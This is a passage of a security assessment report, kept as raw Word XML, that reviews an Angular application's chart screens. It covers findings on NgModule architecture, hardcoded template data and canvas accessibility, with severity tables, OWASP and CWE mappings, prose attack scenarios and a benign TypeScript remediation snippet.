                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Application architecture; future security control implementation surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The documentation notes that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ChartsComponent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uses the traditional NgModule-based architecture rather than Angular's standalone component pattern, and identifies this as "a migration opportunity as the codebase evolves toward modern Angular conventions." From a security perspective, standalone components offer more explicit dependency declaration, reducing the risk of unintended transitive imports through shared NgModules. The NgModule pattern can obscure which components, directives, and pipes are available within a module's scope, potentially allowing unintended access to security-sensitive components if module boundaries are not carefully maintained.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section 17 of the Charts screen documentation states: "the absence of a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">standalone: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">flag suggests this component uses the traditional NgModule-based architecture rather than Angular's newer standalone component pattern, which may represent a migration opportunity."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This is an architectural concern rather than a directly exploitable vulnerability. In a large NgModule, a developer may inadvertently expose a security-sensitive component or directive to a broader scope than intended, because NgModule declarations are shared across all components within the module.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Plan a migration to Angular standalone components as part of the next major refactoring cycle, prioritizing security-sensitive modules first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the interim, audit the NgModule declaration for the charts feature module to confirm that no security-sensitive components or directives are unintentionally shared.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document the NgModule boundary explicitly in the module file with a comment listing which components are intentionally exported vs. internal-only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Charts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — Section 17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="Xba20fbe909e164f0c6456d9f829a36e6a9c00b3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Chartjs —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/chartjs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Security Profile: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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Not documented — delegated to route guards in unreviewed routing module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Not documented — delegated to route guards in unreviewed routing module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Data Sensitivity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Low — static/hardcoded chart data; no PII or sensitive business data documented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attack Surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Low — no user inputs, no API calls; Chart.js canvas rendering only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Finding Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Critical: 0, High: 0, Medium: 1, Low: 1, Info: 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SEC-006: Hardcoded Chart Data in Template — Data Integrity and Maintainability Risk</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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A04 — Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-798: Use of Hard-coded Credentials (by analogy — hard-coded data values)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AVSV Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V1.5.1 — Verify that input and output requirements clearly define how to handle and process data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ChartjsComponent</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— template data definition pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chart datasets rendered to users; business data accuracy and integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The documentation confirms that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ChartjsComponent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is a stateless presentational component with no TypeScript class logic, and explicitly states: "All chart data displayed on this screen is either statically defined in the HTML template or within child components' own definitions." Section 17 reinforces this: "The complete absence of any TypeScript logic means all chart configuration and data is likely hardcoded in the HTML template, making it difficult to maintain, test, or make data-driven." Hardcoded data in templates bypasses all server-side authorization checks — the data is always visible to any user who can render the component, regardless of their role or permissions. If the charts are intended to display business-sensitive metrics (even as demo data), hardcoded values in the template are served to all users who can access the route, with no ability to apply row-level or role-based data filtering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section 5 of the Chartjs screen documentation states: "All chart data displayed on this screen is either statically defined in the HTML template or within child components' own definitions." Section 17 states: "The complete absence of any TypeScript logic means all chart configuration and data is likely hardcoded in the HTML template, making it difficult to maintain, test, or make data-driven."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A user with a low-privilege role (e.g., "viewer") accesses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/chartjs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Because the data is hardcoded in the template and no server-side data filtering is applied, the user sees the same dataset as an administrator. If the hardcoded data represents real business metrics (even as representative samples), this constitutes unauthorized data exposure. Additionally, because the data is in the template rather than fetched from an API, it cannot be updated without a code deployment, increasing the risk that stale or incorrect data is presented as current.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Migrate chart datasets from hardcoded template literals to TypeScript component properties, populated either from a service or from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@Input</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bindings:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ChartjsComponent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">implements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> OnInit {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> barChartData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ChartData </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { datasets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> labels</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [] }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">constructor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> chartDataService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ChartDataService) {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ngOnInit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">chartDataService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">getBarChartData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">subscribe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">barChartData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> data)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If the screen is genuinely a static demo with no real business data, document this explicitly in the component and add a code comment confirming the data is synthetic — this prevents future developers from treating it as a live data source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verify by inspecting the compiled template in the browser's developer tools — no real business metrics should appear as literal values in the rendered HTML source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Chartjs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/chartjs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — Sections 5 and 17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SEC-007: Chart.js Canvas Accessibility Gap — Indirect Security Implication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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A04 — Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-1021: Improper Restriction of Rendered UI Layers or Frames</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AVSV Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V5.3.3 — Verify that context-aware output encoding is used to protect against XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
